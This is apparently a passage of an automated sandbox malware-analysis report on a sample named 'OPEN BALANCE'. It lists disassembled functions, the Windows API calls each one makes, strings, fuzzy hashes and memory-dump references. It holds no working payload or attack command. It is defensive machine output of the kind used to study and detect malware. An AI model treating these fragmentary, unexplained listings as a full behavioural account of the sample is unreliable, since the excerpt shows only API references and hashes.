Opcode Fuzzy Hash: 9600ae76997ebc5ea7d1ddbdae0c12cb49ebd538e940422daa9a2a2bd497147a
Instruction Fuzzy Hash: 1AE06DB11022297AEB201B66AC0DEEB3F6CFF53BA1F00021AF506D14819AA4C840C6B0

Function 008D8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00859639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00859693
Part of subcall function 00859639: SelectObject.GDI32(?,00000000), ref: 008596A2
Part of subcall function 00859639: BeginPath.GDI32(?), ref: 008596B9
Part of subcall function 00859639: SelectObject.GDI32(?,00000000), ref: 008596E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 008D8887
LineTo.GDI32(?,?,?), ref: 008D8894
EndPath.GDI32(?), ref: 008D88A4
StrokePath.GDI32(?), ref: 008D88B2

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: cd8266d33140dba41aafd537ea5e8d611cf9c4b39f21ab819e33fd63338236c3
Instruction ID: 6bd12f5797bee278ffbef420ebf68ed38b7a46caf26571983bd8206594355457
Opcode Fuzzy Hash: cd8266d33140dba41aafd537ea5e8d611cf9c4b39f21ab819e33fd63338236c3
Instruction Fuzzy Hash: 36F09A36006659FADB122F94AC09FCA3B59BF06310F408202FA11A10E1C7741910DBA5

Function 008598B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 008598CC
SetTextColor.GDI32(?,?), ref: 008598D6
SetBkMode.GDI32(?,00000001), ref: 008598E9
GetStockObject.GDI32(00000005), ref: 008598F1

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: e7ed14a7cf1bc0582d6af9aa80433a82b166919fa4538a195b5f2752ddcf6885
Instruction ID: f4b4a1eb87a44747829435b0abac11c9e776716f333a75a6f86ebef56896f9b6
Opcode Fuzzy Hash: e7ed14a7cf1bc0582d6af9aa80433a82b166919fa4538a195b5f2752ddcf6885
Instruction Fuzzy Hash: B4E06D31245291AADF215B74BC09BE83F20FB12336F08831AF6FA980E1C3714640DB10

Function 008A162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 008A1634
OpenThreadToken.ADVAPI32(00000000,?,?,?,008A11D9), ref: 008A163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008A11D9), ref: 008A1648
OpenProcessToken.ADVAPI32(00000000,?,?,?,008A11D9), ref: 008A164F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 7c023b301a2e3f40918299e8624bfe0aa5428060ebeef4335ddb99023987bb57
Instruction ID: a1e19022f1a72cbb30497c7f86304cddde23aa1827457d82ac18996f9f06a496
Opcode Fuzzy Hash: 7c023b301a2e3f40918299e8624bfe0aa5428060ebeef4335ddb99023987bb57
Instruction Fuzzy Hash: 18E08631603212DBEB201FE19E0DB4A3B7CFF557A1F144909F245C9080D6344440C750

Function 0089D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0089D858
GetDC.USER32(00000000), ref: 0089D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0089D882
ReleaseDC.USER32(?), ref: 0089D8A3

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: e214c12da9a922638c327b128c78aa1f4b0a8f9d18e4fd9eade740dd4b39e645
Instruction ID: 023745f9be06d54e17eeacb8a75a6998d84f615a395a9e8de311797e5c7a23a4
Opcode Fuzzy Hash: e214c12da9a922638c327b128c78aa1f4b0a8f9d18e4fd9eade740dd4b39e645
Instruction Fuzzy Hash: D1E01AB080120ADFCF41AFA0E80866DBBB5FB18311F18851AE806E7250CB388905EF40

Function 0089D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0089D86C
GetDC.USER32(00000000), ref: 0089D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0089D882
ReleaseDC.USER32(?), ref: 0089D8A3

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 6cf642002dccdee7c5d81f1e870f81bf3e603f11a2c7673c512f932af1c44538
Instruction ID: 1e85647c9e77c4f1bc8d5aa0798994813dde4a0dcc0697d00d70b72e4368be9f
Opcode Fuzzy Hash: 6cf642002dccdee7c5d81f1e870f81bf3e603f11a2c7673c512f932af1c44538
Instruction Fuzzy Hash: 6CE04F70C01205DFCF509FA0E80C66DBBB5FB18311F14810AF806E7250CB389905DF40

Function 008B648E Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 367COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008B64DC
CoInitialize.OLE32(00000000), ref: 008B6639

Strings

.lnk, xrefs: 008B64BA, 008B6524, 008B65E0

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Initialize_wcslen
String ID: .lnk
API String ID: 211254875-24824748
Opcode ID: 4292d8d72e0300773e6307979920f6c1c4efe45e76a0f4a257a9420927d39274
Instruction ID: 8c054fca404c4648dc9a0ca7fc3581f7d7ccdfbfaa5a384c2bedaceba25f1204
Opcode Fuzzy Hash: 4292d8d72e0300773e6307979920f6c1c4efe45e76a0f4a257a9420927d39274
Instruction Fuzzy Hash: 19D12671508205AFC314EF28C8819ABB7E9FF99704F00496DF595CB2A1EB71E919CB92

Function 008B581E Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 336COMMON

Download Yara Rule

APIs

Part of subcall function 00843AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00843A97,?,?,00842E7F,?,?,?,00000000), ref: 00843AC2

_wcslen.LIBCMT ref: 008B587B
CoInitialize.OLE32(00000000), ref: 008B5995

Strings

.lnk, xrefs: 008B5876, 008B58C1, 008B5985

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: FullInitializeNamePath_wcslen
String ID: .lnk
API String ID: 597254123-24824748
Opcode ID: 2e3faa92201ab2f16db86b20ffc0fa179d9606e4dfaef9f612cd112b3a0a1b7e
Instruction ID: b252b1bc04a81151e97ccc557f74eff0cc1b9fa43d44696067b6b7b756f3b486
Opcode Fuzzy Hash: 2e3faa92201ab2f16db86b20ffc0fa179d9606e4dfaef9f612cd112b3a0a1b7e
Instruction Fuzzy Hash: 43D15271A087059FC714DF28C480A6ABBE1FF89724F148959F88ADB361DB31EC45CB92

Function 008B4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00847620: _wcslen.LIBCMT ref: 00847625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 008B4ED4

Strings

LPT, xrefs: 008B4DFB
*, xrefs: 008B4E10

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: bc0cb5aadc1a0f0b5d1bebf52670704c3729d76330bf7e9ff9d292e9e7425059
Instruction ID: fb3234ff74d66ce43af855854cf279db7f84ae5252e97551ced9c03309aaf850
Opcode Fuzzy Hash: bc0cb5aadc1a0f0b5d1bebf52670704c3729d76330bf7e9ff9d292e9e7425059
Instruction Fuzzy Hash: 85915E75A002189FCB14DF58C485EAABBF1FF44318F199099E80A9F362DB35ED85CB91

Function 0086E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0086E30D

Strings

pow, xrefs: 0086E2E5, 0086E302

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: beed70d600c53d76a49b5b30ef8449897c1bdb7e50f74f7575254eed7abe32c1
Instruction ID: 555885a403f00b154796e34ee8246723234633d340aa2626827f5a028f1af998
Opcode Fuzzy Hash: beed70d600c53d76a49b5b30ef8449897c1bdb7e50f74f7575254eed7abe32c1
Instruction Fuzzy Hash: 23516B65A0C20696DB257718CA413793BA8FB40B40F35C968F099C63EDDF30CC95DA87

Function 0085E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0085E1B1

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 0001343be4386a5f3bf997afb5d8fbb4f457e95b5a056281f5ba8cefa133f558
Instruction ID: 70b08960240f4793bb7e69809cec2d0f681b3c9d932685763e2ccd23b08a7b32
Opcode Fuzzy Hash: 0001343be4386a5f3bf997afb5d8fbb4f457e95b5a056281f5ba8cefa133f558
Instruction Fuzzy Hash: B751F33550424AEFDF19EFA8C881ABA7BA5FF15311F284055FC91DB290D6309E46CB62

Function 0085F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0085F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0085F2BB

Strings

@, xrefs: 0085F2AF

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 9dc03b04332e8382a16a2c349255d133b782fd920887b0e78197c8c3a6d09fc6
Instruction ID: 61479eb3d7240fd46c04816115a521b2551580ded93ae6adadfc3d40980962b1
Opcode Fuzzy Hash: 9dc03b04332e8382a16a2c349255d133b782fd920887b0e78197c8c3a6d09fc6
Instruction Fuzzy Hash: BD515771419B489BD320AF54D886BABBBF8FB84300F81885DF2D981195EF718529CB67

Function 008C5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 008C57E0
_wcslen.LIBCMT ref: 008C57EC

Strings

CALLARGARRAY, xrefs: 008C57E6, 008C57EB

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: f13fd4eeea9d9037cd84a5b3f148f26424bc1796ac6f16e4153a074e61985c9b
Instruction ID: a562664ea9bf43beb7bb534081bd6f29cb634716a5860048820a9eb426b871ec
Opcode Fuzzy Hash: f13fd4eeea9d9037cd84a5b3f148f26424bc1796ac6f16e4153a074e61985c9b
Instruction Fuzzy Hash: AF416C31A002099FCF14DFA9C881DAEBBB5FF59764B14416DE505E7291E730ED81CBA1

Function 008BD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008BD130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008BD13A

Strings

|, xrefs: 008BD10B

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 5d850c3b1a4fe86ee7ad1759e2acfc9840273e700c1c1cdf6394a532e50eb1a6
Instruction ID: e16305041cc9edaf1dc665dccc5b70b054718c3059abe6d398f47f2a9c9f5ec4
Opcode Fuzzy Hash: 5d850c3b1a4fe86ee7ad1759e2acfc9840273e700c1c1cdf6394a532e50eb1a6
Instruction Fuzzy Hash: 2D311A71D01219ABCF15EFA8CC85AEEBFB9FF05304F100019F815E6262E731AA16CB51

Function 008D356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 008D3621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 008D365C

Strings

static, xrefs: 008D35BC

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 9b7891d01ff862317c8cfc8b6295f74ba8a43f105bb2e814438ff8564274a0ed
Instruction ID: 7a890bce3fe61fc9f5d63d0d236701d7ad3b753785c6a38d4b0cfb942cc28b7f
Opcode Fuzzy Hash: 9b7891d01ff862317c8cfc8b6295f74ba8a43f105bb2e814438ff8564274a0ed
Instruction Fuzzy Hash: 44319C71110604AEDB109F28EC81EFB73A9FF98724F00871AF9A5D7280DA31ED91DB61

Function 008D4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 008D461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008D4634

Strings

', xrefs: 008D458E

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 388032480b066dfb86b507cd76b423a79ea1569dd252b16eb7eec5ceb1a00cb7
Instruction ID: cf9b93bff297ddf6d47313c3e12618caa811440efb2235dc787363943d711d57
Opcode Fuzzy Hash: 388032480b066dfb86b507cd76b423a79ea1569dd252b16eb7eec5ceb1a00cb7
Instruction Fuzzy Hash: 02312774A0120AAFDB14CFA9D981BDA7BB5FF09300F10526AE905EB381D770E941CF90

Function 008D31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008D327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008D3287

Strings

Combobox, xrefs: 008D3249

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 1ff0369e0668277dce657e9b8aab5239b5726bce295c39739b6d3eb4a4c7b2a4
Instruction ID: 32a881dfefc5b440ad137305fec3609485a489891d8154971948f3afc9843dda
Opcode Fuzzy Hash: 1ff0369e0668277dce657e9b8aab5239b5726bce295c39739b6d3eb4a4c7b2a4
Instruction Fuzzy Hash: 1711B271B40208BFEF219E94DC81EBB3B6AFB94365F10422AF918E7390D6719D518761

Function 008D3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0084600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0084604C
Part of subcall function 0084600E: GetStockObject.GDI32(00000011), ref: 00846060
Part of subcall function 0084600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0084606A

GetWindowRect.USER32(00000000,?), ref: 008D377A
GetSysColor.USER32(00000012), ref: 008D3794

Strings

static, xrefs: 008D3757

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
